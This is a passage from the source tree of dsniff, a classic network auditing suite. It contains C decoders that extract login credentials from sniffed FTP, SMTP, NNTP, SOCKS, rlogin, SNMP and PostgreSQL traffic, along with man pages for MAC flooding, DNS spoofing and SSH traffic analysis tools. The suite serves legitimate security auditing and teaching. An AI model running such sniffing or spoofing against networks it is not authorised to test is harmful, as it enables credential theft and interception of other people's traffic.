Dug Song 38 | -------------------------------------------------------------------------------- /decode_napster.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_napster.c 3 | * 4 | * Napster. w00w00! 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: decode_napster.c,v 1.6 2001/03/15 08:33:01 dugsong Exp $ 9 | */ 10 | 11 | #include "config.h" 12 | 13 | #include 14 | 15 | #include 16 | #include 17 | 18 | #include "buf.h" 19 | #include "decode.h" 20 | 21 | int 22 | decode_napster(u_char *buf, int len, u_char *obuf, int olen) 23 | { 24 | struct buf inbuf, outbuf; 25 | u_short i, type; 26 | 27 | buf_init(&inbuf, buf, len); 28 | buf_init(&outbuf, obuf, olen); 29 | 30 | if (buf_get(&inbuf, &i, sizeof(i)) != sizeof(i)) 31 | return (0); 32 | 33 | i = pletohs(&i); 34 | 35 | if (buf_get(&inbuf, &type, sizeof(type)) != sizeof(type)) 36 | return (0); 37 | 38 | type = pletohs(&type); 39 | 40 | if (type != 2 || i > buf_len(&inbuf)) 41 | return (0); 42 | 43 | buf_put(&outbuf, buf_ptr(&inbuf), i); 44 | buf_put(&outbuf, "\n", 1); 45 | 46 | buf_end(&outbuf); 47 | 48 | return (buf_len(&outbuf)); 49 | } 50 | 51 | -------------------------------------------------------------------------------- /mailsnarf.8: -------------------------------------------------------------------------------- 1 | .TH MAILSNARF 8 2 | .ad 3 | .fi 4 | .SH NAME 5 | mailsnarf 6 | \- 7 | sniff mail messages in Berkeley mbox format 8 | .SH SYNOPSIS 9 | .na 10 | .nf 11 | .fi 12 | \fBmailsnarf\fR [\fB-i \fIinterface\fR | \fB-p \fIpcapfile\fR] [[\fB-v\fR] \fIpattern [\fIexpression\fR]] 13 | .SH DESCRIPTION 14 | .ad 15 | .fi 16 | \fBmailsnarf\fR outputs e-mail messages sniffed from SMTP and POP 17 | traffic in Berkeley mbox format, suitable for offline browsing with 18 | your favorite mail reader (mail(1), pine(1), etc.). 19 | .SH OPTIONS 20 | .IP "\fB-i \fIinterface\fR" 21 | Specify the interface to listen on. 22 | .IP "\fB-p \fIpcapfile\fR" 23 | Process packets from the specified PCAP capture file instead of the network. 24 | .IP \fB-v\fR 25 | "Versus" mode. Invert the sense of matching, to select non-matching 26 | messages. 27 | .IP \fIpattern\fR 28 | Specify regular expression for message header/body matching. 29 | .IP "\fIexpression\fR" 30 | Specify a tcpdump(8) filter expression to select traffic to sniff. 31 | .SH "SEE ALSO" 32 | dsniff(8), mail(1), pine(1) 33 | .SH AUTHOR 34 | .na 35 | .nf 36 | Dug Song 37 | -------------------------------------------------------------------------------- /asn1.c: -------------------------------------------------------------------------------- 1 | /* 2 | * asn1.c 3 | * 4 | * Copyright (c) 2000 Dug Song 5 | * 6 | * $Id: asn1.c,v 1.4 2001/03/15 08:32:58 dugsong Exp $ 7 | */ 8 | 9 | #include "config.h" 10 | 11 | #include 12 | #include 13 | 14 | #include 15 | 16 | #include "buf.h" 17 | #include "asn1.h" 18 | 19 | int 20 | asn1_type(buf_t buf) 21 | { 22 | u_char c; 23 | 24 | if (buf_get(buf, &c, 1) != 1) 25 | return (-1); 26 | 27 | return (c & 0x1f); 28 | } 29 | 30 | int 31 | asn1_len(buf_t buf) 32 | { 33 | u_char *p, c; 34 | int num; 35 | 36 | if (buf_get(buf, &c, 1) != 1) 37 | return (-1); 38 | 39 | if (c >= 128) { 40 | c &= ~128; 41 | p = buf_ptr(buf); 42 | 43 | if (buf_skip(buf, c) < 0) 44 | return (-1); 45 | 46 | switch (c) { 47 | case 1: 48 | num = *p; 49 | break; 50 | case 2: 51 | GETSHORT(num, p); 52 | break; 53 | case 3: 54 | p--; GETLONG(num, p); 55 | num &= 0xfff; 56 | break; 57 | case 4: 58 | GETLONG(num, p); 59 | break; 60 | default: 61 | return (-1); 62 | } 63 | } 64 | else num = c; 65 | 66 | return (num); 67 | } 68 | -------------------------------------------------------------------------------- /sshow.8: -------------------------------------------------------------------------------- 1 | .TH SSHOW 8 2 | .ad 3 | .fi 4 | .SH NAME 5 | sshow 6 | \- 7 | SSH traffic analysis tool 8 | .SH SYNOPSIS 9 | .na 10 | .nf 11 | .fi 12 | \fBsshow\fR [\fB-d\fR] [\fB-i \fIinterface\fR | \fB-p \fIpcapfile\fR] [\fIexpression\fR] 13 | .SH DESCRIPTION 14 | .ad 15 | .fi 16 | \fBsshow\fR analyzes encrypted SSH-1 and SSH-2 traffic, identifying 17 | authentication attempts, the lengths of passwords entered in 18 | interactive sessions, and command line lengths. 19 | .LP 20 | The following advisory describes the attacks implemented by 21 | \fBsshow\fR in detail: 22 | .LP 23 | .RS 24 | .I http://www.openwall.com/advisories/OW-003-ssh-traffic-analysis.txt 25 | .RE 26 | .SH OPTIONS 27 | .IP \fB-d\fR 28 | Enable verbose debugging output. 29 | .IP "\fB-i \fIinterface\fR" 30 | Specify the interface to listen on. 31 | .IP "\fB-p \fIpcapfile\fR" 32 | Process packets from the specified PCAP capture file instead of the network. 33 | .IP "\fIexpression\fR" 34 | Specify a tcpdump(8) filter expression to select traffic to sniff. 35 | .SH "SEE ALSO" 36 | dsniff(8), sshmitm(8) 37 | .SH AUTHORS 38 | .na 39 | .nf 40 | Solar Designer 41 | Dug Song 42 | -------------------------------------------------------------------------------- /decode_sniffer.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_sniffer.c 3 | * 4 | * Network Associates Sniffer. 5 | * 6 | * Copyright (c) 2000 Anonymous 7 | * Copyright (c) 2000 Dug Song 8 | * 9 | * $Id: decode_sniffer.c,v 1.4 2001/03/15 08:33:02 dugsong Exp $ 10 | */ 11 | 12 | #include "config.h" 13 | 14 | #include 15 | 16 | #include 17 | #include 18 | 19 | #include "base64.h" 20 | #include "decode.h" 21 | 22 | int 23 | decode_sniffer(u_char *buf, int len, u_char *obuf, int olen) 24 | { 25 | u_int i, opcode; 26 | 27 | if (len < 36 || buf[0] != 5) 28 | return (0); 29 | 30 | opcode = pletohs(&buf[6]); 31 | 32 | if (opcode == 260) { 33 | if (buf[32] == 0) 34 | return (strlcpy(obuf, "[]\n", olen)); 35 | } 36 | else if (opcode == 261) { 37 | if (pletohl(&buf[32]) == -1) 38 | return (strlcpy(obuf, "[]\n", olen)); 39 | } 40 | else return (0); 41 | 42 | buf[len - 3]= '\0'; strtok(&buf[32], "\r\n"); 43 | snprintf(obuf, olen, "%s [", &buf[32]); 44 | len = strlen(obuf); 45 | i = base64_pton(&buf[32], &obuf[len], olen - len - 3); 46 | obuf[len + i] = '\0'; 47 | strlcat(obuf, "]\n", olen); 48 | 49 | return (strlen(obuf)); 50 | } 51 | 52 | -------------------------------------------------------------------------------- /urlsnarf.8: -------------------------------------------------------------------------------- 1 | .TH URLSNARF 8 2 | .ad 3 | .fi 4 | .SH NAME 5 | urlsnarf 6 | \- 7 | sniff HTTP requests in Common Log Format 8 | .SH SYNOPSIS 9 | .na 10 | .nf 11 | .fi 12 | \fBurlsnarf\fR [\fB-n\fR] [\fB-i \fIinterface\fR | \fB-p \fIpcapfile\fR] [[\fB-v\fR] \fIpattern [\fIexpression\fR]] 13 | .SH DESCRIPTION 14 | .ad 15 | .fi 16 | \fBurlsnarf\fR outputs all requested URLs sniffed from HTTP traffic in 17 | CLF (Common Log Format, used by almost all web servers), suitable for 18 | offline post-processing with your favorite web log analysis tool 19 | (analog, wwwstat, etc.). 20 | .SH OPTIONS 21 | .IP \fB-n\fR 22 | Do not resolve IP addresses to hostnames. 23 | .IP "\fB-i \fIinterface\fR" 24 | Specify the interface to listen on. 25 | .IP "\fB-p \fIpcapfile\fR" 26 | Process packets from the specified PCAP capture file instead of the network. 27 | .IP \fB-v\fR 28 | "Versus" mode. Invert the sense of matching, to select non-matching 29 | URLs. 30 | Specify the interface to listen on. 31 | .IP \fIpattern\fR 32 | Specify regular expression for URL matching. 33 | .IP "\fIexpression\fR" 34 | Specify a tcpdump(8) filter expression to select traffic to sniff. 35 | .SH "SEE ALSO" 36 | dsniff(8) 37 | .SH AUTHOR 38 | .na 39 | .nf 40 | Dug Song 41 | -------------------------------------------------------------------------------- /macof.8: -------------------------------------------------------------------------------- 1 | .TH MACOF 8 2 | .ad 3 | .fi 4 | .SH NAME 5 | macof 6 | \- 7 | flood a switched LAN with random MAC addresses 8 | .SH SYNOPSIS 9 | .na 10 | .nf 11 | .fi 12 | \fBmacof\fR [\fB-i \fIinterface\fR] [\fB-s \fIsrc\fR] 13 | [\fB-d \fIdst\fR] [\fB-e \fItha\fR] [\fB-x \fIsport\fR] [\fB-y \fIdport\fR] 14 | [\fB-n \fItimes\fR] 15 | .SH DESCRIPTION 16 | .ad 17 | .fi 18 | \fBmacof\fR floods the local network with random MAC addresses 19 | (causing some switches to fail open in repeating mode, facilitating 20 | sniffing). A straight C port of the original Perl Net::RawIP macof 21 | program by Ian Vitek . 22 | .SH OPTIONS 23 | .IP "\fB-i \fIinterface\fR" 24 | Specify the interface to send on. 25 | .IP "\fB-s \fIsrc\fR" 26 | Specify source IP address. 27 | .IP "\fB-d \fIdst\fR" 28 | Specify destination IP address. 29 | .IP "\fB-e \fItha\fR" 30 | Specify target hardware address. 31 | .IP "\fB-x \fIsport\fR" 32 | Specify TCP source port. 33 | .IP "\fB-y \fIdport\fR" 34 | Specify TCP destination port. 35 | .IP "\fB-n \fItimes\fR" 36 | Specify the number of packets to send. 37 | .LP 38 | Values for any options left unspecified will be generated randomly. 39 | .SH "SEE ALSO" 40 | dsniff(8) 41 | .SH AUTHOR 42 | .na 43 | .nf 44 | Dug Song 45 | -------------------------------------------------------------------------------- /dnsspoof.8: -------------------------------------------------------------------------------- 1 | .TH DNSSPOOF 8 2 | .ad 3 | .fi 4 | .SH NAME 5 | dnsspoof 6 | \- 7 | forge replies to DNS address / pointer queries 8 | .SH SYNOPSIS 9 | .na 10 | .nf 11 | .fi 12 | \fBdnsspoof\fR [\fB-i \fIinterface\fR] [\fB-f \fIhostsfile\fR] 13 | [\fIexpression\fR] 14 | .SH DESCRIPTION 15 | .ad 16 | .fi 17 | \fBdnsspoof\fR forges replies to arbitrary DNS address / pointer queries 18 | on the LAN. This is useful in bypassing hostname-based access controls, 19 | or in implementing a variety of man-in-the-middle attacks. 20 | .SH OPTIONS 21 | .IP "\fB-i \fIinterface\fR" 22 | Specify the interface to use. 23 | .IP "\fB-f \fIhostsfile\fR" 24 | Specify the pathname of a file in hosts(5) format. Only one hostname 25 | allowed per line (no aliases), although hostnames may contain 26 | wildcards (such as \fI*.doubleclick.net\fR). 27 | .IP "\fIexpression\fR" 28 | Specify a tcpdump(8) filter expression to select traffic to sniff. 29 | .LP 30 | If no \fIhostsfile\fR is specified, replies will be forged for all 31 | address queries on the LAN with an answer of the local machine's IP 32 | address. 33 | .SH FILES 34 | .IP \fI/usr/local/lib/dnsspoof.hosts\fR 35 | Sample hosts file. 36 | .SH "SEE ALSO" 37 | dsniff(8), hosts(5) 38 | .SH AUTHOR 39 | .na 40 | .nf 41 | Dug Song 42 | -------------------------------------------------------------------------------- /decode_socks.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_socks.c 3 | * 4 | * NEC SOCKS. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: decode_socks.c,v 1.4 2001/03/15 08:33:02 dugsong Exp $ 9 | */ 10 | 11 | #include "config.h" 12 | 13 | #include 14 | 15 | #include 16 | #include 17 | 18 | #include "decode.h" 19 | 20 | int 21 | decode_socks(u_char *buf, int len, u_char *obuf, int olen) 22 | { 23 | u_char *p; 24 | int i, n; 25 | 26 | p = buf; 27 | 28 | if (len < 4 || *p++ != 5) /* SOCKS version */ 29 | return (0); 30 | 31 | if ((n = *p++) > len - 5) /* nmethods */ 32 | return (0); 33 | 34 | for (i = 0; i < n; i++) /* USERNAME/PASSWORD method? */ 35 | if (p[i] == 2) break; 36 | 37 | if (i == n) return (0); 38 | 39 | p += n; 40 | if (*p++ != 1) return (0); /* USERNAME/PASSWORD version */ 41 | 42 | n = *p++; 43 | if (n > len - (p - buf)) 44 | return (0); 45 | 46 | memmove(p - 1, p, n); p[n - 1] = '\0'; 47 | snprintf(obuf, olen, "%s ", p - 1); 48 | p += n; 49 | 50 | n = *p++; 51 | if (n > len - (p - buf)) 52 | return (0); 53 | 54 | memmove(p - 1, p, n); p[n - 1] = '\0'; 55 | strlcat(obuf, p - 1, olen); 56 | strlcat(obuf, "\n", olen); 57 | 58 | return (strlen(obuf)); 59 | } 60 | 61 | -------------------------------------------------------------------------------- /decode_rlogin.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_rlogin.c 3 | * 4 | * Berkeley remote login/shell/exec. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: decode_rlogin.c,v 1.6 2001/03/15 08:33:02 dugsong Exp $ 9 | */ 10 | 11 | #include "config.h" 12 | 13 | #include 14 | 15 | #include 16 | #include 17 | 18 | #include "options.h" 19 | #include "decode.h" 20 | 21 | int 22 | decode_rlogin(u_char *buf, int len, u_char *obuf, int olen) 23 | { 24 | u_char *p, *q; 25 | 26 | /* Skip first NULL, or rexec stderr port */ 27 | for (p = buf; p - buf < len && *p == '\0'; p++) 28 | ; /* VOID */ 29 | 30 | strlcpy(obuf, "[", olen); 31 | strlcat(obuf, p, olen); /* Local username */ 32 | strlcat(obuf, ":", olen); 33 | p += strlen(p) + 1; 34 | 35 | strlcat(obuf, p, olen); /* Remote username */ 36 | strlcat(obuf, "]\n", olen); 37 | p += strlen(p) + 1; 38 | 39 | p += strlen(p) + 1; /* Skip term info */ 40 | 41 | if ((q = strstr(p, "\xff\xffss")) != NULL) /* Skip window size */ 42 | p += 12; 43 | 44 | for (p = strtok(p, "\r\n"); p != NULL; p = strtok(NULL, "\r\n")) { 45 | strlcat(obuf, p, olen); 46 | strlcat(obuf, "\n", olen); 47 | } 48 | if (!strip_lines(obuf, Opt_lines)) 49 | return (0); 50 | 51 | return (strlen(obuf)); 52 | } 53 | 54 | -------------------------------------------------------------------------------- /decode_snmp.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_snmp.c 3 | * 4 | * Simple Network Management Protocol. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: decode_snmp.c,v 1.6 2001/03/15 08:33:02 dugsong Exp $ 9 | */ 10 | 11 | #include "config.h" 12 | 13 | #include 14 | 15 | #include 16 | #include 17 | #include 18 | 19 | #include "buf.h" 20 | #include "asn1.h" 21 | #include "decode.h" 22 | 23 | int 24 | decode_snmp(u_char *buf, int len, u_char *obuf, int olen) 25 | { 26 | struct buf *b, inbuf, outbuf; 27 | u_char *p, vers; 28 | int i; 29 | 30 | buf_init(&inbuf, buf, len); 31 | buf_init(&outbuf, obuf, olen); 32 | 33 | if (asn1_type(&inbuf) != ASN1_SEQUENCE) 34 | return (0); 35 | asn1_len(&inbuf); /* XXX - skip sequence length */ 36 | 37 | if (asn1_type(&inbuf) != ASN1_INTEGER) 38 | return (0); 39 | if (asn1_len(&inbuf) != 1) /* XXX - check version length */ 40 | return (0); 41 | buf_get(&inbuf, &vers, sizeof(vers)); 42 | 43 | if (asn1_type(&inbuf) != ASN1_STRING) 44 | return (0); 45 | i = asn1_len(&inbuf); 46 | b = buf_tok(&inbuf, NULL, i); 47 | p = buf_strdup(b); 48 | 49 | buf_putf(&outbuf, "[version %d]\n%s\n", vers + 1, p); 50 | free(p); 51 | buf_end(&outbuf); 52 | 53 | return (buf_len(&outbuf)); 54 | } 55 | 56 | -------------------------------------------------------------------------------- /decode_smtp.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_smtp.c 3 | * 4 | * Simple Mail Transfer Protocol. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: decode_smtp.c,v 1.3 2001/03/15 08:33:02 dugsong Exp $ 9 | */ 10 | 11 | #include "config.h" 12 | 13 | #include 14 | 15 | #include 16 | #include 17 | 18 | #include "base64.h" 19 | #include "options.h" 20 | #include "decode.h" 21 | 22 | int 23 | decode_smtp(u_char *buf, int len, u_char *obuf, int olen) 24 | { 25 | char *p; 26 | int i, j, login = 0; 27 | 28 | obuf[0] = '\0'; 29 | 30 | for (p = strtok(buf, "\r\n"); p != NULL; p = strtok(NULL, "\r\n")) { 31 | if (login == 1) { 32 | strlcat(obuf, p, olen); 33 | i = base64_pton(p, p, strlen(p)); 34 | p[i] = '\0'; 35 | j = strlen(obuf); 36 | snprintf(obuf + j, olen - j, " [%s]\n", p); 37 | login = 0; 38 | } 39 | else if (strncmp(p, "AUTH LOGIN ", 11) == 0) { 40 | strlcat(obuf, p, olen); 41 | p += 11; 42 | i = base64_pton(p, p, strlen(p)); 43 | p[i] = '\0'; 44 | j = strlen(obuf); 45 | snprintf(obuf + j, olen - j, " [%s]\n", p); 46 | login = 1; 47 | } 48 | else if (strncmp(p, "MAIL ", 5) == 0 || 49 | strncmp(p, "RCPT ", 5) == 0 || 50 | strncmp(p, "DATA", 4) == 0) { 51 | break; 52 | } 53 | } 54 | return (strlen(obuf)); 55 | } 56 | -------------------------------------------------------------------------------- /dnsspoof.hosts: -------------------------------------------------------------------------------- 1 | # $Id: dnsspoof.hosts,v 1.2 2000/08/28 13:28:21 dugsong Exp $ 2 | # 3 | # Sample hosts file for dnsspoof - kill web banner ads for Niels. :-) 4 | # 5 | 127.0.0.1 ad.* 6 | 127.0.0.1 ads*.* 7 | 127.0.0.1 adbot*.* 8 | 127.0.0.1 adcount*.* 9 | 127.0.0.1 adfinity*.* 10 | 127.0.0.1 adforce*.* 11 | 127.0.0.1 adimage*.* 12 | 127.0.0.1 adlink*.* 13 | 127.0.0.1 adserv*.* 14 | 127.0.0.1 adremote*.* 15 | 127.0.0.1 adv.* 16 | 127.0.0.1 advert*.* 17 | 127.0.0.1 banner*.* 18 | 127.0.0.1 count*.* 19 | 127.0.0.1 promo*.* 20 | 127.0.0.1 werbung*.* 21 | 127.0.0.1 *ads*.*.com 22 | 127.0.0.1 *.adbot.com 23 | 127.0.0.1 *.adone.com 24 | 127.0.0.1 *.adforce.com 25 | 127.0.0.1 *.ad-up.com 26 | 127.0.0.1 *.advert*.* 27 | 127.0.0.1 *.banner*.* 28 | 127.0.0.1 *.bfast.com 29 | 127.0.0.1 *.burstnet.com 30 | 127.0.0.1 *.doubleclick.net 31 | 127.0.0.1 *.focalink.com 32 | 127.0.0.1 *.flycast.com 33 | 127.0.0.1 *.freestats.com 34 | 127.0.0.1 *.hitbox.com 35 | 127.0.0.1 *.globaltrack.com 36 | 127.0.0.1 *.globaltrak.net 37 | 127.0.0.1 *.imagine-inc.com 38 | 127.0.0.1 *.imgis.com 39 | 127.0.0.1 *.link*.com 40 | 127.0.0.1 *.memory.net 41 | 127.0.0.1 *.preferences.com 42 | 127.0.0.1 *.smartclicks.com 43 | 127.0.0.1 *.sponsorpool.net 44 | 127.0.0.1 *.stats.net 45 | 127.0.0.1 *.stattrax.com 46 | 127.0.0.1 *.*tracker.com 47 | 127.0.0.1 *.valueclick.com 48 | 127.0.0.1 *.wisewire.com 49 | -------------------------------------------------------------------------------- /decode_postgresql.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_postgresql.c 3 | * 4 | * PostgreSQL. 5 | * 6 | * Thanks to Eric Jackson for packet traces. 7 | * 8 | * Copyright (c) 2000 Dug Song 9 | * 10 | * $Id: decode_postgresql.c,v 1.6 2001/03/15 08:33:02 dugsong Exp $ 11 | */ 12 | 13 | #include "config.h" 14 | 15 | #include 16 | 17 | #include 18 | #include 19 | 20 | #include "decode.h" 21 | 22 | #define STARTUP_PKTLEN 296 23 | 24 | int 25 | decode_postgresql(u_char *buf, int len, u_char *obuf, int olen) 26 | { 27 | u_int32_t plen; 28 | u_char *p; 29 | char *db, *user; 30 | 31 | if (len < STARTUP_PKTLEN) 32 | return (0); 33 | 34 | obuf[0] = '\0'; 35 | db = user = NULL; 36 | 37 | for (;;) { 38 | if (len < 4) break; 39 | plen = pntohl(buf); 40 | 41 | if (plen > len) break; 42 | p = buf + 4; 43 | 44 | if (plen == STARTUP_PKTLEN) { 45 | if (pntohl(p) >> 16 == 2) { 46 | db = p + 4; db[63] = '\0'; 47 | user = db + 64; user[31] = '\0'; 48 | } 49 | } 50 | else if (db != NULL && user != NULL) { 51 | buf[plen - 1] = '\0'; 52 | snprintf(obuf + strlen(obuf), 53 | olen - strlen(obuf), 54 | "%s\n%s\n%s\n", db, user, p); 55 | db = user = NULL; 56 | } 57 | buf += plen; 58 | len -= plen; 59 | } 60 | return (strlen(obuf)); 61 | } 62 | 63 | -------------------------------------------------------------------------------- /decode_ftp.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_ftp.c 3 | * 4 | * File Transfer Protocol. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: decode_ftp.c,v 1.7 2001/03/15 08:32:59 dugsong Exp $ 9 | */ 10 | 11 | #include "config.h" 12 | 13 | #include 14 | 15 | #include 16 | #include 17 | 18 | #include "options.h" 19 | #include "buf.h" 20 | #include "decode.h" 21 | 22 | int 23 | decode_ftp(u_char *buf, int len, u_char *obuf, int olen) 24 | { 25 | struct buf *line, inbuf, outbuf; 26 | int i, n; 27 | 28 | if ((len = strip_telopts(buf, len)) == 0) 29 | return (0); 30 | 31 | buf_init(&inbuf, buf, len); 32 | buf_init(&outbuf, obuf, olen); 33 | 34 | if (!buf_isascii(&inbuf)) 35 | return (0); 36 | 37 | n = 0; 38 | 39 | while ((i = buf_index(&inbuf, "\n", 1)) != -1) { 40 | line = buf_tok(&inbuf, NULL, i); 41 | buf_skip(&inbuf, 1); 42 | 43 | if (i > 0 && line->base[i - 1] == '\r') 44 | line->end--; 45 | line->base[line->end] = '\0'; 46 | 47 | if (strncasecmp(buf_ptr(line), "USER ", 5) == 0 || 48 | strncasecmp(buf_ptr(line), "ACCT ", 5) == 0 || 49 | strncasecmp(buf_ptr(line), "PASS ", 5) == 0) { 50 | buf_putf(&outbuf, "%s\n", buf_ptr(line)); 51 | n++; 52 | } 53 | } 54 | if (n < 2) return (0); 55 | 56 | buf_end(&outbuf); 57 | 58 | return (buf_len(&outbuf)); 59 | } 60 | 61 | -------------------------------------------------------------------------------- /dsniff.services: -------------------------------------------------------------------------------- 1 | # $Id: dsniff.services,v 1.8 2000/12/15 20:10:58 dugsong Exp $ 2 | # 3 | # Network services, dsniff style 4 | # 5 | ftp 21/tcp 6 | telnet 23/tcp 7 | smtp 25/tcp 8 | pptp 47/ip 9 | http 80/tcp 10 | ospf 89/ip 11 | http 98/tcp 12 | poppass 106/tcp 13 | pop 109/tcp 14 | pop 110/tcp 15 | portmap 111/tcp 16 | portmap -111/tcp 17 | portmap 111/udp 18 | portmap -111/udp 19 | vrrp 112/ip 20 | nntp 119/tcp 21 | smb 139/tcp 22 | imap 143/tcp 23 | snmp 161/udp 24 | imap 220/tcp 25 | telnet 261/tcp 26 | ldap 389/tcp 27 | mmxp 417/tcp 28 | mmxp 417/udp 29 | rlogin 512/tcp 30 | rlogin 513/tcp 31 | rlogin 514/tcp 32 | rip 520/udp 33 | smtp 587/tcp 34 | socks 1080/tcp 35 | tds 1433/tcp 36 | tds 1433/udp 37 | citrix 1494/tcp 38 | oracle 1521/tcp 39 | oracle 1526/tcp 40 | sniffer 2001/udp 41 | cvs 2401/tcp 42 | mmxp 2417/tcp 43 | mmxp 2417/udp 44 | tds 2638/tcp 45 | http 3128/tcp 46 | icq 4000/udp 47 | napster 4444/tcp 48 | aim 5190/tcp 49 | postgresql 5432/tcp 50 | napster 5555/tcp 51 | pcanywhere 5631/tcp 52 | x11 6000/tcp 53 | x11 6001/tcp 54 | x11 6002/tcp 55 | x11 6003/tcp 56 | x11 6004/tcp 57 | x11 6005/tcp 58 | napster 6666/tcp 59 | irc 6667/tcp 60 | irc 6668/tcp 61 | irc 6669/tcp 62 | tds 7599/tcp 63 | napster 7777/tcp 64 | http 8080/tcp 65 | napster 8888/tcp 66 | aim 9898/tcp 67 | pcanywhere 65301/tcp 68 | mountd 100005/rpc 69 | ypserv 100004/rpc 70 | yppasswd 100009/rpc 71 | -------------------------------------------------------------------------------- /decode_nntp.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_nntp.c 3 | * 4 | * Network News Transport Protocol. 5 | * 6 | * Copyright (c) 2000 Felix von Leitner 7 | * Copyright (c) 2000 Dug Song 8 | * 9 | * $Id: decode_nntp.c,v 1.5 2001/03/15 08:33:01 dugsong Exp $ 10 | */ 11 | 12 | #include "config.h" 13 | 14 | #include 15 | 16 | #include 17 | #include 18 | 19 | #include "base64.h" 20 | #include "decode.h" 21 | 22 | int 23 | decode_nntp(u_char *buf, int len, u_char *obuf, int olen) 24 | { 25 | char *p; 26 | int i, simple, dpa; 27 | 28 | obuf[0] = '\0'; 29 | simple = dpa = 0; 30 | 31 | for (p = strtok(buf, "\r\n"); p != NULL; p = strtok(NULL, "\r\n")) { 32 | if (simple == 1) { 33 | strlcat(obuf, p, olen); 34 | strlcat(obuf, "\n", olen); 35 | simple = 0; 36 | } 37 | else if (strncasecmp(p, "AUTHINFO ", 9) == 0) { 38 | strlcat(obuf, p, olen); 39 | 40 | if (strncasecmp(p + 9, "SIMPLE", 6) == 0) { 41 | simple = 1; 42 | } 43 | else if (strncasecmp(p + 9, "GENERIC ", 8) == 0) { 44 | if (strncasecmp(p + 17, "DPA", 3) == 0) { 45 | dpa = 1; 46 | } 47 | else if (dpa == 1) { 48 | p += 17; 49 | i = base64_pton(p, p, strlen(p)); 50 | p[i] = '\0'; 51 | i = strlen(obuf); 52 | snprintf(obuf + i, olen - i, 53 | " [%s]", p); 54 | } 55 | } 56 | strlcat(obuf, "\n", olen); 57 | } 58 | } 59 | return (strlen(obuf)); 60 | } 61 | 62 | -------------------------------------------------------------------------------- /decode_hex.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_hex.c 3 | * 4 | * Hex dump, for debugging. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: decode_hex.c,v 1.5 2001/03/15 08:32:59 dugsong Exp $ 9 | */ 10 | 11 | #include "config.h" 12 | 13 | #include 14 | #include 15 | 16 | #include 17 | #include 18 | #include 19 | 20 | #include "buf.h" 21 | #include "decode.h" 22 | 23 | /* adapted from OpenBSD tcpdump: dump the buffer in emacs-hexl format */ 24 | 25 | int 26 | decode_hex(u_char *buf, int len, u_char *obuf, int olen) 27 | { 28 | struct buf inbuf, outbuf; 29 | u_int i, j, k; 30 | u_char c; 31 | 32 | buf_init(&inbuf, buf, len); 33 | buf_init(&outbuf, obuf, olen); 34 | 35 | while ((i = buf_len(&inbuf)) > 0) { 36 | i = i < 16 ? i : 16; 37 | k = buf_tell(&inbuf); 38 | 39 | buf_putf(&outbuf, " %04x: ", k); 40 | 41 | for (j = 0; j < i; j++) { 42 | buf_get(&inbuf, &c, 1); 43 | buf_putf(&outbuf, "%02x", (u_int)c); 44 | if ((j % 2) == 1) 45 | buf_put(&outbuf, " ", 1); 46 | } 47 | for (; j < 16; j++) { 48 | buf_put(&outbuf, " ", (j % 2) + 2); 49 | } 50 | buf_put(&outbuf, " ", 1); 51 | 52 | buf_seek(&inbuf, k, SEEK_SET); 53 | 54 | for (j = 0; j < i; j++) { 55 | buf_get(&inbuf, &c, 1); 56 | c = isprint(c) ? c : '.'; 57 | buf_putf(&outbuf, "%c", c); 58 | } 59 | buf_put(&outbuf, "\n", 1); 60 | } 61 | buf_end(&outbuf); 62 | 63 | return (buf_len(&outbuf)); 64 | } 65 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | 2 | Copyright (c) 1999-2010 Dug Song , et al. 3 | All rights reserved, all wrongs reversed. 4 | 5 | Redistribution and use in source and binary forms, with or without 6 | modification, are permitted provided that the following conditions 7 | are met: 8 | 9 | 1. Redistributions of source code must retain the above copyright 10 | notice, this list of conditions and the following disclaimer. 11 | 2. Redistributions in binary form must reproduce the above copyright 12 | notice, this list of conditions and the following disclaimer in the 13 | documentation and/or other materials provided with the distribution. 14 | 3. The names of authors may not be used to endorse or promote products 15 | derived from this software without specific prior written permission. 16 | 17 | THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, 18 | INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY 19 | AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL 20 | THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, 21 | EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, 22 | PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; 23 | OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, 24 | WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 25 | OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF 26 | ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 27 | 28 | -------------------------------------------------------------------------------- /decode_citrix.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_citrix.c 3 | * 4 | * Citrix ICA. 5 | * 6 | * http://www.securityfocus.com/templates/archive.pike?list=1&date=200 \ 7 | * 0-04-15&msg=Pine.BSO.4.20.0003290949280.2640-100000@naughty.monkey.org 8 | * 9 | * Thanks to Jeremie Kass for providing me with 10 | * traffic traces. 11 | * 12 | * Copyright (c) 2000 Dug Song 13 | * 14 | * $Id: decode_citrix.c,v 1.5 2001/03/15 08:32:59 dugsong Exp $ 15 | 